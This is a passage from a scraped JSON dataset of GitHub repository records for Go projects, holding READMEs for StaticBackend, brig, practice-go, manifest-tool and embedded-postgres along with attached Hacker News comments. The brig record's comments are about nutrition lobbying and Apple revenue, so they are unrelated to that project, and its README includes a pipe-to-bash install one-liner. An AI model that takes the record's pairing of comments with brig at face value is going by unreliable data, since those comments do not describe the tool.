currently authenticated user performing the action.\n// base is the current tenant's database to execute action\n// \"tasks\" is the collection name\ntasks := backend.Collection(auth, base, \"tasks\")\nnewTask, err := tasks.Create(Task{Title: \"testing\"})\n// newTask.ID is filled with the unique ID of the created task in DB\n```\n\nView a [full example in the doc](https://pkg.go.dev/github.com/staticbackendhq/core/backend#example-package).\n\n### Documentation for the `backend` Go package\n\nRefer to the \n[Go documentation](https://pkg.go.dev/github.com/staticbackendhq/core/backend) \nto know about all functions and examples.\n\n## What can you build\n\nI built StaticBackend with the mindset of someone tired of writing the same code \nover and over on the backend. If your application needs one or all of \nuser management, database, file storage, real-time interactions, it should be \na good fit.\n\nI'm personally using it to build SaaS:\n\n[En Pyjama - an online course platform for kids](https://enpyjama.com)\n\nAbandoned projects:\n\n* [Vivid - Automatic video clips for podcasts](https://vivid.fm)\n* [Tangara - one page checkout for creators](https://tangara.io)\n\nIt can be used from client-side and/or server-side.\n\n## How it works / dev workflow\n\nThe main idea is that StaticBackend is your backend API for your applications. \nA performant free and open-source self-hosted Firebase alternative.\n\n_Note that it can also be used from your backend code as well._\n\nOnce you have an instance running and your first app created, you may install \nthe JavaScript client-side library:\n\n```shell\n$> npm install @staticbackend/js\n```\n\nLet's create a user account and get a session `token` and create a `task` \ndocument in the `tasks` collection:\n\n```javascript\nimport { Backend } from \"@staticbackend/js\";\n\nconst bkn = new Backend(\"your_public-key\", \"dev\");\n\nlet token = \"\";\n\nlogin = async () => {\n\tconst res = await bkn.register(\"email@test.com\", \"password\");\n\tif (!res.ok) {\n\t\tconsole.error(res.content);\n\t\treturn;\n\t}\n\ttoken = res.content;\n\n\tcreateTask();\n}\n\ncreateTask = async () => {\n\tconst task = {\n\t\tdesc: \"Do something for XYZ\",\n\t\tdone: false\n\t};\n\n\tconst res = bkn.create(token, \"tasks\", task);\n\tif (!res.ok) {\n\t\tconsole.error(res.content);\n\t\treturn;\n\t}\n\tconsole.log(res.content);\n}\n```\n\nThe last `console.log` prints\n\n```json\n{\n\t\"id\": \"123456-unique-id\",\n\t\"accountId\": \"aaa-bbb-unique-account-id\",\n\t\"desc\": \"Do something for XYZ\",\n\t\"done\": false\n}\n```\n\nFrom there you build your application using the \n[database](https://staticbackend.com/docs/database/) CRUD and query functions, \nthe [real-time component](https://staticbackend.com/docs/websocket/),\nthe [storage API](https://staticbackend.com/docs/storage/), etc.\n\nStaticBackend provides commonly used building blocks for web applications.\n\nYou may use server-side libraries for Node, Python and Go or use an HTTP client \nand use your preferred language.\n\n## Get started with the self-hosted version\n\n### Deploy buttons\n\n**Heroku**: Deploy an instance to your Heroku account.\n\n[![Deploy](https://www.herokucdn.com/deploy/button.svg)](https://heroku.com/deploy?template=https://github.com/staticbackendhq/core)\n\n**Render**: Deploy an instance to your Render account\n\n[![Deploy to Render](https://render.com/images/deploy-to-render-button.svg)](https://render.com/deploy)\n\n### Docker or manual setup\n\n\n[![Get started with self-hosted version](https://img.youtube.com/vi/vQjfaMxidx4/0.jpg)](https://www.youtube.com/watch?v=vQjfaMxidx4)\n\n_Click on the image above to see a video showing how to get started with the \nself-hosted version_.\n\nPlease refer to this [guide here](https://staticbackend.com/getting-started/self-hosting/).\n\nWe also have this \n[blog post](https://staticbackend.com/blog/get-started-self-hosted-version/) \nthat includes the above video.\n\nIf you have Docker & Docker Compose ready, here's how you can have your server \nup and running in dev mode in 30 seconds:\n\n```shell\n$> git clone git@github.com:staticbackendhq/core.git\n$> cd core\n$> cp .demo.env .env\n$> docker build . -t staticbackend:latest\n$> docker-compose -f docker-compose-demo.yml up\n```\n\nTest your instance:\n\n```shell\n$> curl -v http://localhost:8099/db/test\n```\n\nYou should get an error as follow:\n\n```shell\n< HTTP/1.1 401 Unauthorized\n< Content-Type: text/plain; charset=utf-8\n< Vary: Origin\n< Vary: Access-Control-Request-Method\n< Vary: Access-Control-Request-Headers\n< X-Content-Type-Options: nosniff\n< Date: Tue, 03 Aug 2021 11:40:15 GMT\n< Content-Length: 33\n< \ninvalid StaticBackend public key\n```\n\nThis is normal, as you're trying to request protected API, but you're all set.\n\nThe next step is to visit [http://localhost:8099](http://localhost:8099) and \ncreate your first app. Please note that in dev mode you'll have to look at your \ndocker compose output terminal to see the content of the email after creating \nyour app. This email contains all the keys and your super user account \ninformation.\n\n## Documentation\n\nWe're trying to have the best experience possible reading our documentation.\n\nPlease help us improve if you have any feedback.\n\n**Documentation with example using our libraries or curl**:\n\n* [Introduction and authentication](https://staticbackend.com/docs/)\n* [User management](https://staticbackend.com/docs/users/)\n* [Social logins (beta)](https://staticbackend.com/docs/social-logins/)\n* [Database](https://staticbackend.com/docs/database/)\n* [Real-time communication](https://staticbackend.com/docs/websocket/)\n* [File storage](https://staticbackend.com/docs/storage/)\n* [Server-side functions](https://staticbackend.com/docs/functions/)\n* [Send emails](https://staticbackend.com/docs/sendmail/)\n* [Caching](https://staticbackend.com/docs/cache/)\n* [Forms](https://staticbackend.com/docs/forms/)\n* [Root token](https://staticbackend.com/docs/root-token/)\n\n## Librairies & CLI\n\nWe [provide a CLI](https://staticbackend.com/getting-started/) for local \ndevelopment if you want to get things started without any infrastructure and \nfor prototyping / testing.\n\nYou can use the CLI to manage your database, form submissions, and deploy \nserver-side-functions. We have an alpha Web UI as well to manage your resources.\n\nWe have a page listing our \n[client-side and server-side libraries](https://staticbackend.com/docs/libraries/).\n\n## Examples\n\nIf you'd like to see specific examples please let us know via the \n[Discussions](https://github.com/staticbackendhq/core/discussions) tab.\n\nHere's the examples we have created so far:\n\n* [To-do list example](https://staticbackend.com/getting-started/)\n* [Realtime collaboration](https://staticbackend.com/blog/realtime-collaboration-example/)\n* [Live chat using server-side function & real-time component](https://staticbackend.com/blog/server-side-functions-task-scheduler-example/)\n* [Jamstack Bostom talk](https://www.youtube.com/watch?v=Uf-K6io9p7w)\n\n## Deploying in production\n\nWe've not written anything yet regarding deploying, but once you have the \ncore` built into a binary and have access to either PostgreSQL or MongoDB, and \nRedis in production you should be able to deploy it like any other Go server.\n\nWe'll have documentation and an example soon for deploying to DigitalOcean.\n\n## Feedback & contributing\n\nIf you have any feedback (good or bad) we'd be more than happy to talk. Please \nuse the [Discussions](https://github.com/staticbackendhq/core/discussions) tab.\n\nSame for contributing. The easiest is to get in touch first. We're working \nto make it easier to contribute code. If you'd like to work on something \nprecise let us know.\n\nHere are videos made specifically for people wanting to contribute:\n\n* [Intro, setup, running tests, project structure](https://youtu.be/uTj7UEbg0p4)\n* [backend package and v1.4.1 refactor and changes](https://youtu.be/oWxk2g2yp_g)\n\nCheck the [contributing file](CONTRIBUTING.md) for details.\n\n\n## Help\n\nIf you're looking to help the project, here are some ways:\n\n* Use it and share your experiences.\n* Sponsor the development via GitHub sponsors.\n* Spread the words, a tweet, a blog post, any mention is helpful.\n* Join the [Discord](https://discord.gg/vgh2PTp9ZB) server.\n", "readme_type": "markdown", "hn_comments": "Hey,I'm switching my SaaS StaticBackend to an open-source model.As a developer tool, I think it might have a better chance of getting initial traction as a fully open-source project. I picked the MIT license. I'm hoping to discover its actual potential.I've built it with Go. It's a backend that handles user management, database, forms, and real-time communication.My goal was and still is to have a lightweight Firebase without the vendor lock-in. Self-hosting the open-source version will enable total control over who owns the data and whatnot.Any feedback is appreciated.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "sahib/brig", "link": "https://github.com/sahib/brig", "tags": [], "stars": 540, "description": "File synchronization on top of ipfs with git like interface & web based UI", "lang": "Go", "repo_lang": "", "readme": "# `brig`: Ship your data around the world\n\n
\n\"a\n
\n\n[![go reportcard](https://goreportcard.com/badge/github.com/sahib/brig)](https://goreportcard.com/report/github.com/sahib/brig)\n[![GoDoc](https://godoc.org/github.com/sahib/brig?status.svg)](https://godoc.org/github.com/sahib/brig)\n[![Build Status](https://travis-ci.org/sahib/brig.svg?branch=master)](https://travis-ci.org/sahib/brig)\n[![Documentation](https://readthedocs.org/projects/rmlint/badge/?version=latest)](http://brig.readthedocs.io/en/latest)\n[![License: AGPL v3](https://img.shields.io/badge/License-AGPL%20v3-blue.svg)](https://www.gnu.org/licenses/agpl-3.0)\n[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/1558/badge)](https://bestpractices.coreinfrastructure.org/en/projects/1558)\n\n![brig gateway in the files tab](docs/_static/gateway-files.png)\n\n## Table of Contents\n\n- [`brig`: Ship your data around the world](#brig-ship-your-data-around-the-world)\n - [Table of Contents](#table-of-contents)\n - [About](#about)\n - [Installation](#installation)\n - [Getting started](#getting-started)\n - [Status](#status)\n - [Documentation](#documentation)\n - [Donations](#donations)\n - [Focus](#focus)\n\n## About\n\n`brig` is a distributed & secure file synchronization tool with version control.\nIt is based on `IPFS`, written in Go and will feel familiar to `git` users.\n\n**Key feature highlights:**\n\n* Encryption of data in rest and transport + compression on the fly.\n* Simplified `git` version control.\n* Sync algorithm that can handle moved files and empty directories and files.\n* Your data does not need to be stored on the device you are currently using.\n* FUSE filesystem that feels like a normal (sync) folder.\n* No central server at all. Still, central architectures can be build with `brig`.\n* Simple user identification and discovery with users that look like email addresses.\n\nAlso take a look [at the documentation](http://brig.readthedocs.io/en/latest/index.html) for more details.\n\n## Installation\n\nYou can download the latest script with the following oneliner:\n\n```bash\n# Before you execute this, ask yourself if you trust me.\n$ bash <(curl -s https://raw.githubusercontent.com/sahib/brig/master/scripts/install.sh)\n```\n\nAlternatively, you can simply grab the latest binary from the [release tab](https://github.com/sahib/brig/releases).\n\nDevelopment versions can be installed easily by compiling yourself. If you have\na recent version of `go` (`>= 1.10`) installed, it should be as easy as this:\n\n```bash\n$ go get -d -v -u github.com/sahib/brig # Download the sources.\n$ cd $GOPATH/src/github.com/sahib/brig # Go to the source directory.\n$ git checkout develop # Checkout the develop branch.\n$ go run mage.go # Build the software.\n$ $GOPATH/bin/brig help # Run the binary.\n```\n\nPlease refer to the [install docs](https://brig.readthedocs.io/en/latest/installation.html) for more details.\n\n## Getting started\n\n[![asciicast](https://asciinema.org/a/163713.png)](https://asciinema.org/a/163713)\n\n...If you want to know, what to do after you can read the\n[Quickstart](http://brig.readthedocs.io/en/latest/quickstart.html).\n\nThere is also a ``#brig`` room on ``matrix.org`` you can join with any [Matrix](https://matrix.org) client.\nClick [this link](https://riot.im/app/#/room/#brig:matrix.org) to join the room directly via [Riot.im](https://about.riot.im).\n\n## Status\n\nThis software is in a **beta phase** currently. All mentioned features should\nwork. Things might still change rapidly and there will be no guarantees given\nbefore version `1.0.0`. Do not use `brig` yet as only storage for your\nproduction data. There are still bugs, but it should be safe enough to toy\naround with it quite a bit.\n\nThis project has started end of 2015 and has seen many conceptual changes in\nthe meantime. It started out as research project. After writing my [master\ntheses](https://github.com/disorganizer/brig-thesis) on it, it was put down for\na few months until I picked at up again and currently am trying to push it to\nusable software.\n\nIf you want to open a bug report, just type `brig bug` to get a readily filled template for you.\n\n## Documentation\n\nAll documentation can be found on [ReadTheDocs.org](http://brig.readthedocs.io/en/latest/index.html).\n\n## Donations\n\nIf you're interested in the development and would think about supporting me\nfinancially, then please [contact me!](mailto:sahib@online.de) If you'd like to\ngive me a small & steady donation, you can always use *Liberapay*:\n\n\n\n*Thank you!*\n", "readme_type": "markdown", "hn_comments": "The title might be overblown but I've come to fully expect every government agency is somehow influenced (to say the least) by some organization or another with an ulterior motive.It appears this is just the way the system is set up. Everyone has something to gain from this influence (except the public of course). I've come to accept this as a fact of life and think for myself. Do my own research, consult professionals in matters that are important to me.This is one of the reasons why I look at nutritional and medicinal guidelines recommended by other countries outside the US.This is common complaint at science conferences. Research dollars often go towards shiny things instead of knowledge that will advance diagnostic theory and serve the highest good. Without accurate theory, we cannot advance. The Mediterranean diet is a classic example. Once the researchers were able to show it had some health benefits, it received huge amounts of funding for years. They were able to publish again and again, gaining publicity, gaining more funding and giving the illusion of superiority over other, less-researched, dietary and nutritional tools. Imagine if they had sought to understand how it actually works? We need to ensure that research dollars go towards meaningful projects that seek truth, maintain objectivity and advance knowledge, not agendas.This has to have implications on why no two studies are ever quite the same, and rarely reproducible. Yet another \"study\": https://pubmed.ncbi.nlm.nih.gov/26980822/This is entirely shocking to me and definitely doesn't just promote a sigh, an eyeroll, and a disturbingly-existential internal observation on the futility of getting anything non-money-related done in good faith when money is involved.The Academy of Nutrition and Dietetics is a lobbying group, why would this be surprising to anyone? They have no official government function.Edit: It appears I am wrong, and it is not just a lobbying group. They also issue the licensing needed to sell diet advice in many states.https://www.cdrnet.org/#The Academy and nutrition and dietetics depend on dietitians renewing their Registered Dietitian credential. That's how they make money.In order to force the issue, the AND's lobbyists have gone around the country and made it so that you are required to have a license in 14 states to talk with another individual about food and nutrition.The AND made it so that in order to get that license you must be a registered dietitian, in other words, you must pay a private organization for the privilege to pay the government for a license to talk about food and nutrition.It's a classic government back monopoly that has no positive impact on society, other than protectionism of an outdated business model.https://ij.org/client/heather-kokesch-del-castillo/How is this group \"shaping US nutrition\". Thats quite a claim.If you lookup the histories of the people making the decisions you\u2019ll see their connections to industry.The chair of the committee who oversees dietary recommendations is listed as a professor. She got that for filling for retirement as a professor more than a decade ago. Has worked in industry lobbying and funding industry studies prior to gov work. Not an impartial person.Edit: her LinkedIn is https://www.linkedin.com/in/barbara-schneeman-ph-d-a99b6829. The Damon institute funds stuff for the yogurt companyI thought this had been common knowledge for years.Selling hardware, selling ads, selling entertainment. And the first category is shrinking in value. How many bloody ads do people need?It looks like Apple generated more revenue from wearables (AirPods and Apple Watch) than what it generated from selling Macs.Does net income include or exclude operational expenses (like engineeer salary)? If it excludes it, it\u2019s pretty crazy that the net income is almost 25-30% their total revenue.Big Ideas From His Last 3,000 TweetsCNN and older HN news link:\nhttps://news.ycombinator.com/item?id=20708185https://techcrunch.com/2019/01/06/apple-is-bring-itunes-cont...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "plutov/practice-go", "link": "https://github.com/plutov/practice-go", "tags": ["go", "golang", "hacktoberfest"], "stars": 540, "description": "Practice Go: a collection of Go programming challenges", "lang": "Go", "repo_lang": "", "readme": "## Go coding exercises and elegant solutions [![Build Status](https://travis-ci.org/plutov/practice-go.svg?branch=master)](https://travis-ci.org/plutov/practice-go)\n\n### How to solve\n\n - Each folder has a README.md file and `*_test.go` file, check it and find what kind of function you need to implement.\n - You may use anything you want except 3rd-party packages.\n - Implement the function.\n - Run tests and benchmarks.\n - Create a PR to `master` branch and answer questions from PR template.\n - We will choose the most fast and elegant solution and merge into the repo within 7 days.\n\n### Challenges\n\n - [x] ([@macocha](https://github.com/macocha)) [chess](https://github.com/plutov/practice-go/tree/master/chess)\n - [x] ([@kennygrant](https://github.com/kennygrant)) [floyd](https://github.com/plutov/practice-go/tree/master/floyd)\n - [x] ([@ledongthuc](https://github.com/ledongthuc)) [anagram](https://github.com/plutov/practice-go/tree/master/anagram)\n - [x] ([@heliac2000](https://github.com/heliac2000)) [jaro](https://github.com/plutov/practice-go/tree/master/jaro)\n - [x] ([@nguyengiabk](https://github.com/nguyengiabk)) [mergesort](https://github.com/plutov/practice-go/tree/master/mergesort)\n - [x] ([@nguyengiabk](https://github.com/nguyengiabk)) [wordladder](https://github.com/plutov/practice-go/tree/master/wordladder)\n - [x] ([@EvenPeng](https://github.com/EvenPeng)) [sumdecimal](https://github.com/plutov/practice-go/tree/master/sumdecimal)\n - [x] ([@bediger4000](https://github.com/bediger4000)) [buildword](https://github.com/plutov/practice-go/tree/master/buildword)\n - [x] ([@zerkms](https://github.com/zerkms)) [shorthash](https://github.com/plutov/practice-go/tree/master/shorthash)\n - [x] ([@zerkms](https://github.com/zerkms)) [romannumerals](https://github.com/plutov/practice-go/tree/master/romannumerals)\n - [x] ([@zerkms](https://github.com/zerkms)) [lastlettergame](https://github.com/plutov/practice-go/tree/master/lastlettergame)\n - [x] ([@duckbrain](https://github.com/duckbrain)) [reverseparentheses](https://github.com/plutov/practice-go/tree/master/reverseparentheses)\n - [x] ([@kennygrant](https://github.com/kennygrant)) [functionfrequency](https://github.com/plutov/practice-go/tree/master/functionfrequency)\n - [x] ([@marz619](https://github.com/marz619)) [coins](https://github.com/plutov/practice-go/tree/master/coins)\n - [x] ([@marz619](https://github.com/marz619)) [secretmessage](https://github.com/plutov/practice-go/tree/master/secretmessage)\n - [x] ([@shogg](https://github.com/shogg)) [missingnumbers](https://github.com/plutov/practice-go/tree/master/missingnumbers)\n - [x] ([@HDudzus](https://github.com/HDudzus)) [spiral](https://github.com/plutov/practice-go/tree/master/spiral)\n - [x] ([@TomLefley](https://github.com/TomLefley)) [warriors](https://github.com/plutov/practice-go/tree/master/warriors)\n - [x] ([@shogg](https://github.com/shogg)) [snowflakes](https://github.com/plutov/practice-go/tree/master/snowflakes)\n - [x] ([@shogg](https://github.com/shogg)) [brokennode](https://github.com/plutov/practice-go/tree/master/brokennode)\n - [x] ([@shogg](https://github.com/shogg)) [nasacollage](https://github.com/plutov/practice-go/tree/master/nasacollage)\n- [x] ([@shogg](https://github.com/shogg)) [node_degree](https://github.com/plutov/practice-go/tree/master/node_degree)\n\n### Run tests with benchmarks\n\nRun it in the challenge folder:\n\n```\ngo test -bench .\n```\n\n### How to create new challenge from template\n\n```\n./new.sh challenge_name\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "estesp/manifest-tool", "link": "https://github.com/estesp/manifest-tool", "tags": ["docker", "docker-registry", "docker-image", "docker-images", "multiplatform", "multiarch", "oci-image", "container-registry", "container-image", "container-images", "oci-distribution"], "stars": 540, "description": "Command line tool to create and query container image manifest list/indexes", "lang": "Go", "repo_lang": "", "readme": "## manifest-tool\n\n`manifest-tool` is a command line utility used to view or push multi-platform container image\nreferences located in an OCIv1 or Docker v2.2 compatible container registry.\n\nWhile several other tools include more complete capabilities to view and manipulate the\n*manifest* objects associated with container images and artifacts, `manifest-tool` was created\nas one of the first command line tools capable of assembling \"manifest lists\" (Docker v2.2), now\nmore commonly known as \"indexes\" in the OCIv1 image specification. [**Manifest lists**](https://github.com/distribution/distribution/blob/main/docs/spec/manifest-v2-2.md#manifest-list) or\n[**indexes**](https://github.com/opencontainers/image-spec/blob/main/image-index.md) exist for\nthe purpose of combining an array of architecture and platform specific container image manifests\nunder a single reference. This allows a container runtime to select the appropriate index\nentry that matches the local node's architecture and platform. Before these kinds of manifests\nwere available it required separate instructions, configurations, or code changes to set\nup the appropriate platform-specific image reference depending on the platform in use.\n\n### Installation\n\nThe releases of `manifest-tool` are built using the latest Go version, and binaries for many\narchitectures are available as pre-built binaries with each release, found on the\n[GitHub releases](https://github.com/estesp/manifest-tool/releases) page.\n\nYou can also use `manifest-tool` via an existing Docker image automatically generated for a\nlarge number of architectures with each release. To use this image simply run\n```sh\n$ docker run mplatform/manifest-tool\n```\n\nTo build `manifest-tool` locally, clone this repository and build the binary as shown below.\nNote that you will need to have a recent version of the Go SDK installed on your system as well\nas `make`.\n\n```sh\n$ git clone https://github.com/estesp/manifest-tool\n$ cd manifest-tool && make binary\n```\n\nIf you don't want to install a local development environment but have Docker installed, you\ncan use `make build` to build `manifest-tool` inside the official Go SDK container.\n\nAdditional targets `make static` target will build a statically-linked binary,\nand `make cross` will build a binary for all supported platforms using Go's cross-compilation\ncapabilities.\n\n### Querying Manifests Without Installation\n\nIf you only have a requirement to query public image references to validate\nplatform support you can use a related project, [mquery](https://github.com/estesp/mquery),\nwhich allows remote querying of public registry images.\n\nUse `mquery` by running it's DockerHub-located image, **mplatform/mquery:latest**, and\nspecifying a target image to query, as shown in the example below:\n\n```sh\n$ docker run --rm mplatform/mquery mplatform/mquery:latest\nImage: mplatform/mquery:latest (digest: sha256:d0989420b6f0d2b929fd9355f15c767f62d0e9a72cdf999d1eb16e6073782c71)\n * Manifest List: Yes (Image type: application/vnd.docker.distribution.manifest.list.v2+json)\n * Supported platforms:\n - linux/ppc64le\n - linux/amd64\n - linux/386\n - linux/s390x\n - linux/riscv64\n - linux/arm64/v8\n - linux/arm/v7\n - linux/arm/v6\n - windows/amd64:10.0.17763.2300\n - windows/amd64:10.0.14393.4770\n```\n\nThe `mquery` program itself is a small Go program running as an AWS\nLambda function using a small cache so recent image results are cached.\nMore information is available in the [mquery GitHub repo](https://github.com/estesp/mquery).\n\nOutdated, but original, details on the creation of mquery are found in\n[my blog post from the Moby Summit EU 2017](https://integratedcode.us/2017/11/21/moby-summit-serverless-openwhisk-multi-arch/)\non this topic.\n\n### Sample Usage\n\n`manifest-tool` can:\n - **inspect** manifests (of all media types) within any registry supporting the OCI distribution API\n - **push** manifest list/index objects to any registry which supports the OCI distribution API and the appropriate image (Docker or OCI) image specification.\n\n> *Note:* For pushing you will have to provide your registry credentials via either a) the command line, b) use a credential helper application (`manifest-tool` supports these in the same way Docker client does), or c) already\nbe logged in to a registry and have an existing Docker client configuration file with credentials.\n\n#### Inspect\n\nInspect/view the manifest of any image reference (*repo/image:tag* combination)\nwith the **inspect** command. You must provide a tag, even if the tag is `latest` as\nthe containerd resolver does not auto-append latest to image references and `manifest-tool`\nutilizes the containerd resolver library.\n\nExample output of an `inspect` on a manifest list media type is shown below:\n\n```sh\n$ $ manifest-tool inspect golang:1.17\nName: golang:1.17 (Type: application/vnd.docker.distribution.manifest.list.v2+json)\nDigest: sha256:1a35cc2c5338409227c7293add327ebe42e1ee5465049f6c57c829588e3f8a39\n * Contains 10 manifest references:\n[1] Type: application/vnd.docker.distribution.manifest.v2+json\n[1] Digest: sha256:a6c0b3e8b7d2faed2415448f20e75ed26eed6fdb1d261873ed4205907d92c674\n[1] Length: 1796\n[1] Platform:\n[1] - OS: linux\n[1] - Arch: amd64\n[1] # Layers: 7\n layer 01: digest = sha256:0c6b8ff8c37e92eb1ca65ed8917e818927d5bf318b6f18896049b5d9afc28343\n layer 02: digest = sha256:412caad352a3ecbb29c080379407ae0761e7b9b454f7239cbfd1d1da25e06b29\n layer 03: digest = sha256:e6d3e61f7a504fa66d7275123969e9917570188650eb84b2280a726b996040f6\n layer 04: digest = sha256:461bb1d8c517c7f9fc0f1df66c9dc34c85a23421c1e1c540b2e28cbb258e75f5\n layer 05: digest = sha256:9297634c9537024497f76a2e1b374d8a315baa21d45bf36dc7980dc42ab93b0b\n layer 06: digest = sha256:c9cefb9872505d3a6fdcbbdbe4103393da3e384443c5a8cdd62bc368927ea1cc\n layer 07: digest = sha256:8560fc463426dc7e494720250efec25cdae1c4bf796c1a0172f791c0c7dde1c6\n\n... skipping 8 manifest entries\n\n[10] Type: application/vnd.docker.distribution.manifest.v2+json\n[10] Digest: sha256:78af34429b7d75d61890746d39e27beb447970bad6803ed11ab4be920dbbd061\n[10] Length: 3401\n[10] Platform:\n[10] - OS: windows\n[10] - OS Vers: 10.0.17763.2565\n[10] - Arch: amd64\n[10] # Layers: 13\n layer 01: digest = sha256:4612f6d0b889cad0ed0292fae3a0b0c8a9e49aff6dea8eb049b2386d9b07986f\n layer 02: digest = sha256:1bd78008c728d8f9e56dc2093e6eb55f0f0b1aa96e5d0c7ccc830c5f60876cdf\n layer 03: digest = sha256:f0c1566a9285d9465334dc923e9d6fd93a51b3ef6cb8497efcacbcf64e3b93fc\n layer 04: digest = sha256:1b56caecef9c44ed58d2621ffb6f87f797b532c81f1271d9c339222462523eb2\n layer 05: digest = sha256:5a3ed0a076d58c949f5debdbc3616b6ccd008426c62635ab387836344123e2a6\n layer 06: digest = sha256:f25f9584c1aa90dae36704d6bef0e59e72002fcb13e8a4618f64c9b13479c0df\n layer 07: digest = sha256:12d4fbc7cf0f85fc63860f052f76bfb4429eca8b878abce79a25bfdc30f9e9f5\n layer 08: digest = sha256:c325dc9f1660ea537aae55b89be63d336762d5a3a02e929d52940586fb0f677e\n layer 09: digest = sha256:dd4f3aabaa2a9bf80e2a7f417dba559f6b34e640c21b138dce099328406c8903\n layer 10: digest = sha256:57e61367d26baed9e16a8d5310c520ae3429d5cc7956569f325cd9de01f33604\n layer 11: digest = sha256:98eb9abc560e8d857685b3b0131c733bdbb5f3c79e93fe7e9163e443736c2f51\n layer 12: digest = sha256:fffb0b96d90540c5fe04bec7c3803e767fc06c03da00c569b92ec1abeb2db503\n layer 13: digest = sha256:e6c16363a908ee64151cd232d466b723e3edac978f1c7693db3dcbed09694d76\n```\n\nWhile we can query non-manifest lists/indexes as well, this entry is clearly\na manifest list (see the media type) with many platforms supported. To read how\ncontainer engines like Docker use this information to determine what image/layers\nto pull read this early [blog post on multi-platform support in Docker](https://integratedcode.us/2016/04/22/a-step-towards-multi-platform-docker-images/).\n\n#### Create/Push\n\nYou can create manifest list or index entries in a registry by using the **push**\ncommand with either a YAML file describing the images to assemble or by using\na series of command line parameters.\n\nA sample YAML file is shown below. As long as the target registry supports the\ncross-repository push feature the source and target image names can differ as\nlong as they are within the same registry host. For example, a source image could\nbe named `myprivreg:5000/someimage_arm64:latest` and\nreferenced by a manifest list in repository `myprivreg:5000/someimage:latest`.\n\nGiven a private registry running on port 5000, here is a sample YAML file input\nto `manifest-tool` to create a manifest list combining an 64-bit ARMv8 image and\nan amd64 image:\n\n```yaml\nimage: myprivreg:5000/someimage:latest\nmanifests:\n -\n image: myprivreg:5000/someimage:arm64\n platform:\n architecture: arm64\n os: linux\n -\n image: myprivreg:5000/someimage:amd64\n platform:\n architecture: amd64\n os: linux\n```\n\n> Note: Of course these component images must have been built and pushed to\n> your target registry before running `manifest-tool`. The job of `manifest-tool` is\n> simply to create the manifest which assembles existing images under a combined\n> image reference pointing to a manifest list or OCI index.\n\nGiven this example YAML input you can push this manifest list as follows:\n\n```sh\n$ manifest-tool push from-spec someimage.yaml\n```\n\n`manifest-tool` can also use command line arguments with a templating model to\nspecify the architecture/platform list and the from and to image formats as\nshown below:\n\n```sh\n$ manifest-tool push from-args \\\n --platforms linux/amd64,linux/s390x,linux/arm64 \\\n --template foo/bar-ARCH:v1 \\\n --target foo/bar:v1\n```\n\nSpecifically:\n - `--platforms` specifies which platforms you want to push for in the form OS/ARCH,OS/ARCH,...\n - `--template` specifies the image repo:tag source for inputs by replacing the placeholders `OS`, `ARCH` and `VARIANT` with the inputs from `--platforms`.\n - `--target` specifies the target image repo:tag that will be the manifest list entry in the registry.\n\nWhen using the optional `VARIANT` placeholder, it is ignored when a `platform` does not have a variant.\n\n```sh\n$ manifest-tool push from-args \\\n --platforms linux/amd64,linux/arm/v5,linux/arm/v7 \\\n --template foo/bar-ARCHVARIANT:v1 \\\n --target foo/bar:v1\n```\n\nFor the above example, `linux/amd64` when applied to the template will\nlook for an image named `foo/bar-amd64:v1`, while the platform entry `linux/arm/v5`\nwill resolve to an image reference: `foo/bar-armv5:v1`.\n\n### Known Supporting Registries\n\nAll major public cloud registries have added Docker v2.2 manifest list support\nover the years since the \"fat manifest\"-enabled specification came out in 2016.\n\nMost registries also support the formalization of that via the \"index\" manifest\ntype in the OCIv1 image format specification published in 2017.\n\nIf you find a registry provider for which `manifest-tool` does not work properly\nplease open an issue in the GitHub issues for this project.\n\n### Test Index/Manifest List Support\n\nIf you operate or use a registry claiming conformance to Docker v2.2 spec and API\nor the OCIv1 image spec and distribution spec and want to confirm manifest list/index\nsupport please use the pre-configured test script available in this repository.\n\nSee the [test-registry.sh script](https://github.com/estesp/manifest-tool/blob/main/integration/test-registry.sh) in this repo's **integration** directory\nfor further details. A simple example is shown here:\n\n```sh\n$ ./test-registry.sh r.myprivreg.com/somerepo\n```\n\n### History\n\nThis `manifest-tool` codebase was initially a joint project with [Harshal Patil](https://github.com/harche) from IBM Bangalore, and originally forked from the registry client codebase, skopeo, created by [Antonio Murdaca/runc0m](https://github.com/runcom), that later became a part of [Project Atomic](https://github.com/projectatomic/skopeo). Skopeo then\nbecame part of the overall Red Hat container client tooling later in its lifetime where it still resides today in the\n[GitHub containers organization](https://github.com/containers). The **v2** rewrite of `manifest-tool` removed all\nthe original vestiges of skopeo's original registry client and manifest parsing code, but is still part of the **v1**\nreleases of `manifest-tool` and codebase.\n\nThanks to both Antonio and Harshal for their initial work that made this possible! Also, thanks to Christy Perez from IBM Systems for her hard work in bringing the functionality of `manifest-tool` to the Docker client via [a docker/cli PR](https://github.com/docker/cli/pull/138). In early 2018 this PR formed the basis of a new `docker manifest` command\nwhich comprised most of the original code of `manifest-tool` and made multi-platform image creation available to\nusers of the Docker client.\n\n### License\n\n`manifest-tool` is licensed under the Apache Software License (ASL) 2.0\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "fergusstrange/embedded-postgres", "link": "https://github.com/fergusstrange/embedded-postgres", "tags": [], "stars": 540, "description": "Run a real Postgres database locally on Linux, OSX or Windows as part of another Go application or test", "lang": "Go", "repo_lang": "", "readme": "

\n \n

\n\n

\n\"Godoc\"\nCoverage Status\n\"Build\n\"Build\n\"Go\n

\n\n# embedded-postgres\n\nRun a real Postgres database locally on Linux, OSX or Windows as part of another Go application or test.\n\nWhen testing this provides a higher level of confidence than using any in memory alternative. It also requires no other\nexternal dependencies outside of the Go build ecosystem.\n\nHeavily inspired by Java projects [zonkyio/embedded-postgres](https://github.com/zonkyio/embedded-postgres)\nand [opentable/otj-pg-embedded](https://github.com/opentable/otj-pg-embedded) and reliant on the great work being done\nby [zonkyio/embedded-postgres-binaries](https://github.com/zonkyio/embedded-postgres-binaries) in order to fetch\nprecompiled binaries\nfrom [Maven](https://mvnrepository.com/artifact/io.zonky.test.postgres/embedded-postgres-binaries-bom).\n\n## Installation\n\nembedded-postgres uses Go modules and as such can be referenced by release version for use as a library. Use the\nfollowing to add the latest release to your project.\n\n```bash\ngo get -u github.com/fergusstrange/embedded-postgres\n``` \n\n## How to use\n\nThis library aims to require as little configuration as possible, favouring overridable 